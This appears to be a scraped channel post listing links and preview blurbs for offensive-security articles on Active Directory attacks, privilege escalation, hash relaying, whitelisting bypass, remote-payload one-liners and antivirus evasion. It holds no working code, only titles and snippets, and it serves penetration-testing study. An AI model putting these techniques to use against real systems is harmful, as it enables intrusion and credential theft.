Fun with LDAP, Kerberos (and MSRPC) in AD Environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
Speaker Deck
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
Slides from my Track X Thotcon 2018 Workshop ennoscriptd:
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
From XML External Entity to NTLM Domain Hashes
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
Windows Privilege Escalation Guide
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Absolomb
Windows Privilege Escalation Guide
Privilege escalation always comes down to proper enumeration. But to accomplish proper enumeration you need to know what to check and look for. This takes familiarity with systems that normally comes along with experience. At first privilege escalation can…
Windows oneliners to download remote payload and execute arbitrary code
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
arno0x0x
Windows oneliners to download remote payload and execute arbitrary code
In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an a…
Passing the hash with native RDP client (mstsc.exe)
https://michael-eder.net/post/2018/native_rdp_pass_the_hash/
https://michael-eder.net/post/2018/native_rdp_pass_the_hash/
Escalating privileges with ACLs in Active Directory
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
https://github.com/fox-it/Invoke-ACLPwn
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
https://github.com/fox-it/Invoke-ACLPwn
Fox-IT International blog
Escalating privileges with ACLs in Active Directory
Researched and written by Rindert Kramer and Dirk-jan Mollema Introduction During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a f…
Skip Cracking Responder Hashes and Relay Them
http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them
http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them
Threat Blog
Skip Cracking Responder Hashes and Relay Them
Background Responder is a go-to tool for most pentesters. We use it quite often on pentests to quickly gain access to a client’s domain. However, when clients enforce strong password policies and their users don’t choose passwords like 'Ilovemykids2017!'…
Exchange-AD-Privesc. Repository of Exchange privilege escalations to Active Directory
This repository provides a few techniques and noscripts regarding the impact of Microsoft Exchange deployment on Active Directory security.
https://github.com/gdedrouas/Exchange-AD-Privesc
This repository provides a few techniques and noscripts regarding the impact of Microsoft Exchange deployment on Active Directory security.
https://github.com/gdedrouas/Exchange-AD-Privesc
GitHub
GitHub - gdedrouas/Exchange-AD-Privesc: Exchange privilege escalations to Active Directory
Exchange privilege escalations to Active Directory - gdedrouas/Exchange-AD-Privesc
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
https://subt0x11.blogspot.com.br/2018/04/wmicexe-whitelisting-bypass-hacking.html
https://subt0x11.blogspot.com.br/2018/04/wmicexe-whitelisting-bypass-hacking.html
Blogspot
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
tl;dr WMIC can invoke XSL (eXtensible Stylesheet Language) noscripts, either locally or from a URL. Local File wmic process list /FO...
Hiding Metasploit Shellcode to Evade Windows Defender
https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/
https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/
Rapid7
Hiding Metasploit Shellcode to Evade Windows Defender | Rapid7 Blog
If malware development is a cat-and-mouse game, then I would say that the industry creates some of the most terrifying hunters. Learn more.
Detecting hypervisor presence on windows 10
https://revers.engineering/detecting-hypervisor-presence-on-windows-10/
@windowshackinglibrary
https://revers.engineering/detecting-hypervisor-presence-on-windows-10/
@windowshackinglibrary
Reverse Engineering
Detecting Hypervisor Presence on Windows 10 - Reverse Engineering
Detecting a hypervisor on Windows 10 is relatively simple, but due to the simplistic nature of the currently published detection vectors it’s likely that they are also relatively simple to spoof or remove. In this article we’ll detail a few ways of detecting…
Blue Cloud of Death: Red Teaming Azure
https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
@windowshackinglibrary
https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
@windowshackinglibrary
Speaker Deck
Blue Cloud of Death: Red Teaming Azure
BSides Denver Presentation on May 11 2018
On-demand IT services are being publicized as the “new normal”, but often times these services are misunder…
On-demand IT services are being publicized as the “new normal”, but often times these services are misunder…